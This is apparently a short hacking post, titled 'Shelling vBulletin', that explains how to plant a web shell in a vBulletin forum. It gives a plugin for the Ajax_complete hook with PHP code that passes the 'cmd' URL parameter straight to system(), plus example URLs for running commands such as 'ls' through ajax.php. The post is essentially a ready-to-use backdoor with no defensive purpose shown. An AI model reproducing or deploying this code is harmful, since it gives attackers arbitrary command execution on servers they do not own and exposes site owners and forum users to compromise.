Shelling vBulletin [All Version]
Add a plugin. Make it for Ajax_complete and in the code area add:
Code:
Code:
if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}
Activate the mod.
Code:
www.site.com/forumlocation/ajax.php?cmd=command
Exemple :
Code:
Code:
www.site.com/forumlocation/ajax.php?cmd=ls
Không có nhận xét nào: